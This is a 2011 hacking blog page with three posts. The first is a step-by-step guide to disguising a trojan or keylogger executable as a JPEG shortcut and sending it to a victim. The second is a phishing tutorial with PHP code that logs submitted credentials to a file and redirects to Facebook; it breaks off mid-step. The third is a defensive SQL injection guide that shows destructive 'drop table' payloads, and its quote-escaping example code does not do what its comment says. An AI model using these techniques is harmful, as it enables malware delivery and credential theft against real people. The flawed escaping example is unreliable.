This Blog Is For Educational Purposes Only, I am NOT responsible in any way for how this information is used, Use It At Your Own Risk..

Our User's

Search

29 July 2011

Hide EXE File into JPG



This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
Posted by No comments:

23 July 2011

Phishing Tutorial (1)



Today I put togeather a little phishing tutorial for those who dont know how to
make one. Follow these simple steps and soon enough you'll be phishing any site you want. I used facebook as an example.

1.Start out by gathering all the files you will need. (Post.php and and index file)


Post.php-Open up notepad, and type or paste in the following code

header ('Location: Link here');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



Were it says you're link here type in the link of the page you want to get passwords for

(example)

header ('Location: www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Next, save it as post.php

_________________________

All set with that now for the index file. Go to the websight you're phishing on, right
click,and click view page source. When that is complete press "ctr+F" aka find
type in action

you will see a line like this

Posted by No comments:

14 July 2011

How to Protect Your Website from Hacking Attacks

If you are a website owner or developer, you are probably aware of the threat of hackers. There are many ways to protect your database-driven ASP or PHP website from hacker attacks, ranging from weak to strong security measures. Here you will learn about the most common and effective ways to slow down hackers who use methods like SQL injection attacks and XSS (cross-site scripting) via the URL querystring and form inputs. Two general types of hacker blocking techniques are discussed, including custom error pages and input validation. These methods are simple enough that you can do it yourself with only basic coding knowledge. Your best strategy would be to put up a combination of as many little obstacles as possible.

Steps

  1. 1
    SQL database-driven websites are at risk.

  2. 2
    Any web page which passes parameters to a database can be vulnerable to attacks. This includes e-commerce shopping carts or any other website that has a form for login, search, etc. Any SQL database-driven website is at risk of hackers who may be able to enter into the database through a back door. Usually these back doors are present in URL querystrings and form inputs, such as Login forms, Search forms, or other user input textboxes that can communicate with a database.
  3. 3
    An overview of hacking.
  4. 4
    Generally, a hacker can enter bogus characters into the URL querystring or a textbox. The bogus input is then interpreted as SQL rather than ordinary user data and is executed by the unsuspecting database. As a result, the website may break and display an error, allowing the hacker to glean private information about the database. Even worse, the hacker's hazardous scripts may actually be executed on the database, causing security breaches and/or permanent damage.
  5. 5
    How hackers do it.
  6. 6
    The first goal of a hacker is to repeatedly try to break a website, causing it to display a variety of valuable errors that give away private database details. In this way, he can gain insight into the structure of the database and ultimately create a map or footprint of all its tables and columns. The second goal of the hacker is to actually manipulate the database by executing scripts in malicious ways. With control over the database, the hacker may possibly steal credit card numbers, erase data or infect it with viruses, among other nasty things. In essence, the URL querystring and textbox are the two backdoors into a database. Getting errors and manipulating the backdoors are the two methods used by hackers to ultimately destroy a database.
  7. 7
    Hack your own website.
  8. 8
    Let's look at how a hacker might go about breaking into a website. Using the first technique described, he can hack the URL querystring and cause an error to be displayed. You can do a simple test to hack into your own website via the URL querystring. All you have to do is type something else directly into the address bar at the end of your querystring.
  9. 9
    Type your URL like the following example and press enter:
  10. 10
    http://www.mywebsite.com/bookreports.asp?reportID=21
  11. 11
    Now simply add a single quote to the end the querystring and press enter:
  12. 12
    http://www.mywebsite.com/bookreports.asp?reportID=21'
  13. 13
    Generate an error.
  14. 14
    As predicted, you may have successfully broken your website and received an error as follows.
  15. 15
    Error Type:
  16. 16
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
  17. 17
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND users.userID=reports.reportsID'.
  18. 18
    /bookreports.asp, line 20
  19. 19
    The single quote causes an unclosed quotation mark error and now the once-secret table names and column names of your database are publicly visible. After generating a series of these kinds of valuable errors, a hacker can piece together private database details which will ultimately help him break into and wreak havoc on the database.
  20. 20
    Hide website errors.
  21. 21
    The top most effective solution for keeping the private details of your database from getting into the hands of a hacker is to setup a custom error page for your website. This way, a hacker will never see any detailed error messages. If you do nothing else, this is the number one thing that every website must have. Otherwise, you are giving the hacker an open invitation into your database and practically offering him all the information he needs to launch an attack.
  22. 22
    Setup custom error pages.
  23. 23
    Some hosting services automatically use custom error pages to help protect your security. To setup your own custom error page, you will need to consult your web host for instructions. Generally, you will create a new HTML page to look the way you please and that says something short and sweet, like 'Sorry, the page you have requested is unavailable.' Then save it as error404.htm and upload it to your server. Following the instructions from your host, you will change the website settings to point to the new error page. This will stop many hackers right in their tracks.
  24. 24
    Manipulate the URL querystring.
  25. 25
    Besides fishing for errors, a hacker can enter even more dangerous code than a simple single quote into the URL querystring. In an effort to execute malicious scripts on a database, a variety of creative coding is employed, such as %20HAVING%201=1 or maybe %20;shutdown with no wait-- or much worse. Once the hacker is able to execute scripts, the vulnerable database is like putty in their hands. The hacker never has to know the database login or connection string because he is using the URL querystring which already has an open connection.
  26. 26
    http://www.mywebsite.com/bookreports.asp?reportID=21'; drop table myTablename--
  27. 27
    Your table is permanently deleted.
  28. 28
    Manipulate the form input.
  29. 29
    The other most common point of entry besides the URL querystring is the form input. A hacker may manipulate any textbox within an HTML form. A search box or a login form with username and password fields are all prime targets. The hacker can enter bogus characters into the textbox and submit the form. The input is then interpreted as SQL rather than ordinary user data and executed by the database. Again, this attack will either cause an error so he can glean private information about your database, or it may actually insert hazardous scripts and wreak havoc on the database.
  30. 30
    fred'; drop table myTablename--
  31. 31
    Your table is permanently deleted.
  32. 32
    Block input containing malicious code.
  33. 33
    By now, you probably have a good idea of how much damage a hacker can do and you are ready and willing to do whatever it takes to stop them. The number one way to block a hacker from manipulating the URL querstrying and textboxes is to block their input. But, how do you determine who they are, what they will input and whether or not it is safe? Unfortunately, you cannot know. So, you must assume that all user input could be potentially dangerous. A common saying in the programming world is that ALL INPUT IS EVIL. Thus, it must be treated with caution. Everything from everybody should be checked every time to ensure dangerous code does not slip in. This is accomplished by checking all input that is submitted via a querystring or form and then rejecting or removing unsafe characters before it ever reaches the database. If this sounds like a lot of trouble, you are right. But, it is the price we pay to protect our websites and databases from the wrath of hackers. It is your responsibility as the webmaster to ensure that only clean, safe input is allowed to enter your database.
  34. 34
    Input validation.
  35. 35
    To check if the input entered into the URL querystring or textbox is safe, we can use input validation rules. In other words, using ASP code on a web page can validate the input collected from the querystring or form to make sure it contains only safe characters. Once the input is deemed safe, it can be stored in a new variable, inserted into the SQL string and sent to the database. For more details about validation,
  36. 36
    The wash and rinse cycle.
  37. 37
    Input validation should be a two-part process, like a wash and rinse cycle. We want to thoroughly clean all input by first checking for safe characters and second by checking for bad strings. See the resources at the end of this article for a more in depth discussion on this method.
  38. 38
    Filter characters.
  39. 39
    Another method that can be used in conjunction with the above two functions, but is considered to be very weak when used alone, is to sanitize the input by filtering or escaping.
  40. 40
    A well-known threat is the single quote or apostrophe because it breaks the SQL statement. Following is an ASP example that renders the single quote harmless, by replacing it with two single quotes.
  41. 41
    'doubleup single quotes
  42. 42
    newSafeString = replace(searchInput, "'", "")
  43. 43
    Other variations for the replace function include stripping out the script tag and replacing it with a space. Or, filter out characters such as the dollar sign $ quotation mark " semi-colon ; and apostrophe ' the left and right angle brackets <> the left and right parentheses ( ) the pound sign # and the ampersand &. Or convert these characters to their HTML entities.
  44. 44
    Remember to use a solution that best fits your website or consult a professional.
  45. 45
    Finally, there are a few other security measures that you can research and explore on your own. Remember a hacker can easily save a copy of your webpage, then modify the HTML and javascript, then re-upload the page. Therefore, it is best to never use javascript alone for input validation since it can easily be removed, and instead duplicate any javacript validation with ASP validation. Also, hidden input fields are a threat in the same way since they can easily be altered to include bogus code. Other tips include: Never give away any clues about your database, including making your input field names the same as the database field names. Always set a max length for inputs and truncate the excess.
  46. 46
    If you would like to pursue more advanced security techniques, please see the resources at the end of this article. Topics discussed include, password policies, buffer overrun, creative table and column names, table name aliases, set and check data types, .bak files, stored procedures with parameters, and log files.

Warnings

  • Test this on your own website only if you really want to erase a table in your database. Simply, enter the following text after the end of your URL querystring and press enter. Be sure to use the real name of one of your tables (preferably a test table!) in place of myTablename.
  • As always, please remember that databases can be highly vulnerable to hackers. The number and frequency SQL injection attacks and XSS (cross-site scripting) attacks are on the rise. So please ensure you have setup custom error pages and use server-side input validation like ASP as a precaution to ensure database security.
Posted by No comments:
Subscribe to: Posts (Atom)